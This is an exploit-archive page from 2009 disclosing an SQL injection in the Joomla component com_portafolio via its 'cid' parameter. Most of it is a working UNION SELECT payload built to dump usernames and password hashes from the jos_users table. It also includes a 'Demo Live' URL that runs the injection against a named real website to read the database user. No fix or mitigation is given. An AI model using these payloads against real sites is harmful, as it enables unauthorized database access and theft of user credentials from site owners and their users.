[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_portafolio (cid) SQL injection Vulnerability
# Published : 2009-06-08
# Author : Chip D3 Bi0s
# Previous Title : Automated Link Exchange Portal 1.3 Multiple Remote Vulnerabilities
# Next Title : Shop Script Pro 2.12 Remote SQL Injection Exploit


----------------------------------------------------------------------
Joomla Component com_portafolio (cid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_portafolio&task=viewcat&cid=<sql Code>

 <Sql Code>:
 -null+union+select+1,2,3,4,5,6,7,concat(username,0x3a,password),9+jos_users--&Itemid=5
 

Demo Live:
	
In this example, you took the time to rename the table:jos_users
which is normally using joomla

http://www.garboweb.com/index.php?option=com_portafolio&task=viewcat&cid=-null+and+1=2+union+select+1,2,3,4,5,6,7,user(),9--&Itemid=5


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------

# www.Syue.com [2009-06-08]